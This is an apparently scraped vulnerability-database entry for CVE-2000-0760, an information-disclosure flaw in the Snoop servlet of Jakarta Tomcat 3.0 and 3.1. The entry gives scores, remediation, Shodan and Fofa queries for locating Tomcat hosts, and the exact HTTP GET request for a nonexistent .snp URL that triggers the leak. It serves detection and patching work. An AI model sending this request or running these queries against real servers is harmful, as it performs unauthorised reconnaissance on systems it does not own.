🔙 목록으로 돌아가기

CVE-2000-0760: Jakarta Tomcat 3.1 and 3.0 - Information Disclosure

TitleJakarta Tomcat 3.1 and 3.0 - Information Disclosure
AuthorThabisocn,0x_Akoko
SeverityMedium
ImpactAttackers can retrieve sensitive system information, potentially aiding further attacks or information disclosure.
RemediationUpdate to the latest version of Jakarta Tomcat or apply security patches that fix the Snoop servlet issue.
CVSS Score6.4
EPSS Score0.38569
CVE IDCVE-2000-0760
Shodan Querycpe:"cpe:2.3:a:apache:tomcat"http.component:"apache tomcat"product:"tomcat"
Fofa Querybody="apache tomcat"body="jk status manager"
Tags cve cve2000 jakarta tomcat exposure

🔍 Vulnerability Description

Jakarta Tomcat 3.1 and 3.0 under Apache contain a vulnerability in the Snoop servlet that reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension, exploit requires remote access.

🌐 HTTP Request

GET /examples/jsp/snp/anything.snp HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2000/CVE-2000-0760.yaml

🦈 Packet Capture: ⬇️ Download cve-2000-0760.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A